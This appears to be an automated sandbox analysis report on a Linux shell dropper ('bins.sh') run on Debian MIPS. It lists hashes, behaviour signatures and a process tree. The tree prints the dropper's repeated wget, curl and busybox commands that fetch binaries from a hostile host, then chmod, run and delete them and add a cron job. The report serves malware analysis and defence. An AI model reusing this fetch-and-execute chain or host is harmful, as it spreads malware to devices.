Analysis
-
max time kernel
148s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
05-11-2024 00:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
259c24781ea50ed07083d852383db860
-
SHA1
bab7105282bcc4a8c8c8ca56fa657b9223c86fab
-
SHA256
fd9a3d3764a43a1d0cc4af5401c6fb2a4a333c84e66a9323acbd9a5305e9e11c
-
SHA512
c01d8e62e96c399a6f09da0428927e99c7369da10f5f2f4d5f6893f76205e55302a95e5bcee1d83810485414d7326990c05cf37da31e50a8b531a4deb9862ab1
-
SSDEEP
192:iz/+WqahFEQu2kVZNy8Qz3nqahFEQEZNy8QzV1/W:iSWqanEQu2kP6qanEQWb
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1944) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid Process):
740 chmod, 912 chmod, 942 chmod, 953 chmod, 748 chmod, 781 chmod, 890 chmod, 901 chmod, 919 chmod, 929 chmod
-
Executes dropped EXE 5 IoCs
Processes:
ioc | pid | Process
/tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | 741 | sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
/tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | 749 | zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
/tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | 783 | XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
/tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | 902 | TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
/tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | 943 | fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
-
Renames itself 1 IoCs
Processes (pid Process):
784 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description | ioc | Process
File opened for modification | /var/spool/cron/crontabs/tmp.YNfwEz | crontab
-
Enumerates running processes
Discovers information about currently running processes on the system
-
System Network Configuration Discovery 1 TTPs 28 IoCs
Adversaries may gather information about the network configuration of a system.
Processes (pid Process):
911 busybox, 935 wget, 716 wget, 739 busybox, 819 busybox, 905 wget, 917 busybox, 922 wget, 941 busybox, 947 curl, 757 curl, 777 busybox, 799 wget, 915 wget, 948 busybox, 946 wget, 752 wget, 916 curl, 956 wget, 928 busybox, 936 curl, 736 curl, 747 busybox, 802 curl, 923 curl, 744 wget, 745 curl, 906 curl
-
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description | ioc | Process
File opened for modification | /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | curl
File opened for modification | /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | wget
File opened for modification | /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | curl
File opened for modification | /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | busybox
File opened for modification | /tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | busybox
File opened for modification | /tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | busybox
File opened for modification | /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | wget
File opened for modification | /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | curl
Processes
-
/tmp/bins.sh | /tmp/bins.sh | PID:706
  /bin/rm | /bin/rm bins.sh | PID:710
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | PID:716 | System Network Configuration Discovery; Writes file to tmp directory
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | PID:736 | System Network Configuration Discovery; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | PID:739 | System Network Configuration Discovery
  /bin/chmod | chmod 777 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | PID:740 | File and Directory Permissions Modification
  /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | ./sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | PID:741 | Executes dropped EXE
  /bin/rm | rm sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 | PID:743
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | PID:744 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | PID:745 | System Network Configuration Discovery; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | PID:747 | System Network Configuration Discovery
  /bin/chmod | chmod 777 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | PID:748 | File and Directory Permissions Modification
  /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | ./zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | PID:749 | Executes dropped EXE
  /bin/rm | rm zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv | PID:751
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | PID:752 | System Network Configuration Discovery; Writes file to tmp directory
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | PID:757 | System Network Configuration Discovery; Writes file to tmp directory
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | PID:777 | System Network Configuration Discovery; Writes file to tmp directory
  /bin/chmod | chmod 777 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | PID:781 | File and Directory Permissions Modification
  /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | ./XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | PID:783 | Executes dropped EXE; Renames itself; Reads runtime system information
    /bin/sh | sh -c "crontab -l" | PID:785
      /usr/bin/crontab | crontab -l | PID:786
    /bin/sh | sh -c "crontab -" | PID:789
      /usr/bin/crontab | crontab - | PID:790 | Creates/modifies Cron job
  /bin/rm | rm XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB | PID:795
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | PID:799 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | PID:802 | System Network Configuration Discovery
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | PID:819 | System Network Configuration Discovery
  /bin/chmod | chmod 777 MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | PID:890 | File and Directory Permissions Modification
  /tmp/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | ./MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | PID:893
  /bin/rm | rm MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga | PID:895
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | PID:896
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | PID:898
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | PID:900 | Writes file to tmp directory
  /bin/chmod | chmod 777 TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | PID:901 | File and Directory Permissions Modification
  /tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | ./TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | PID:902 | Executes dropped EXE
  /bin/rm | rm TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0 | PID:904
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | PID:905 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | PID:906 | System Network Configuration Discovery
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | PID:911 | System Network Configuration Discovery
  /bin/chmod | chmod 777 jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | PID:912 | File and Directory Permissions Modification
  /tmp/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | ./jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | PID:913
  /bin/rm | rm jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf | PID:914
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | PID:915 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | PID:916 | System Network Configuration Discovery
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | PID:917 | System Network Configuration Discovery
  /bin/chmod | chmod 777 PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | PID:919 | File and Directory Permissions Modification
  /tmp/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | ./PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | PID:920
  /bin/rm | rm PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz | PID:921
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | PID:922 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | PID:923 | System Network Configuration Discovery
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | PID:928 | System Network Configuration Discovery
  /bin/chmod | chmod 777 yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | PID:929 | File and Directory Permissions Modification
  /tmp/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | ./yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | PID:933
  /bin/rm | rm yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW | PID:934
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | PID:935 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | PID:936 | System Network Configuration Discovery
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | PID:941 | System Network Configuration Discovery; Writes file to tmp directory
  /bin/chmod | chmod 777 fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | PID:942 | File and Directory Permissions Modification
  /tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | ./fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | PID:943 | Executes dropped EXE
  /bin/rm | rm fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL | PID:945
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | PID:946 | System Network Configuration Discovery
  /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | PID:947 | System Network Configuration Discovery
  /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | PID:948 | System Network Configuration Discovery
  /bin/chmod | chmod 777 Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | PID:953 | File and Directory Permissions Modification
  /tmp/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | ./Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | PID:954
  /bin/rm | rm Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby | PID:955
  /usr/bin/wget | wget http://conn.masjesu.zip/bins/9cFeF0m7z1ABbUbeeI74twMqXEBb79dgbM | PID:956 | System Network Configuration Discovery
-
Network
MITRE ATT&CK Enterprise v15
Downloads